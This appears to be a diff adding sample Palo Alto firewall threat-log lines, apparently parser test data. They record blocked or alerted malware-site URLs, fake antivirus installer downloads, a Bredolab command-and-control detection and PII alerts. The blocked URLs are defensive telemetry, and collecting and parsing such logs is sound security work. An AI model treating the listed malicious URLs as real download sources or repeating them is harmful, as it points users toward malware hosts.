04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 
09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 
04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 
04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html
+Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 
04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,
+Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
+Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
+Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
+Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 
04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,
+Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,
+Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:56:23 1,2012/10/30 
09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
+Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
+Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 
04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
+Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 
08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
